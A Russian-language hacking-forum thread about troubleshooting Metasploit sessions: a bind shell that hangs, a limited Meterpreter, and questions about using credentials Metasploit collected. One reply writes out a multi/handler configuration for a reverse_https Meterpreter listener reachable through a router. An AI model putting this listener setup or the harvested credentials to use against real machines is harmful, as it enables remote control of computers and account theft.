![]() |
Всем привет!
Проблема следующая: на уязвимой машине поднимаю шелл ( windows/shell/bind_tcp). При попытке подключения метасплоит повисает в неопределенном состоянии и не даёт делать никаких действий кроме как выйти из сессии (ctr+c). Повысить сессию до meterpreter тоже завершается неудачей. В чём может быть проблема ? https://forum.antichat.xyz/attachmen...7987100204.png https://forum.antichat.xyz/attachmen...7987188674.png ---- Добавлено позже ---- Каким то чудом пробился в сессию MP,но меню как то не очень похоже на привычное,сильно урезан функционал ( Почему ? https://forum.antichat.xyz/attachmen...7988816162.png |
Цитата:
|
Цитата:
|
пробовал reverse_tcp вместо этого?
|
Цитата:
Ещё очень интересно,что это за урезанная версия МП и почему не работают команды |
Цитата:
Цитата:
|
Цитата:
|
вообще это метерпретер...решили свою проблему?
|
дело не в полезной нагрузке..а в метасплойте самом...сам сталкивался с данным чудом.
у меня такое случалось когда настраивал ssl шифрования, и запускал листенер в фоном режиме , т.е exploit -J |
Цитата:
---- Добавлено позже ---- Цитата:
Тут проблема скорее в адекватном приёме сессии |
а можете скинуть настройки листенера?
|
Цитата:
|
у вас мертвая сессия..одна из причин неправильные настройки листенера.Вы в локальной сети проводили тестирование, или с внешней.?
|
Цитата:
|
через роутер или впс?
|
Цитата:
|
вы использовали ReverseListenerBindAddress в листенере?
скиньте мне ваш листенер, более чем уверен вы там ошиблись.Дело в том, что если вы тестируете через роутер с белым статическим айпи настройки листенера немного другие..примерно так: msf > use multi/handler msf exploit (handler) > set payload windows/meterpreter/reverse_https msf exploit (handler) > set LHOST (внешний ip) msf exploit (handler) > set LPORT 4444 msf exploit (handler) > set ReverseListenerBindAddress (внутренний IP) msf exploit (handler) >exploit -j |
Цитата:
немножко оффтоп: метасплоит накопал некоторое количество кредов,но я никак не пойму,как ими воспользоваться ) В браузере по указанным портам не выдаёт форму логина\пароля... Как он проверил их на валидность ? https://forum.antichat.xyz/attachmen...0417714474.png |
вы проделайте всё заново, и сбросьте мне скрины консоли.
|
Цитата:
|
| Время: 03:17 |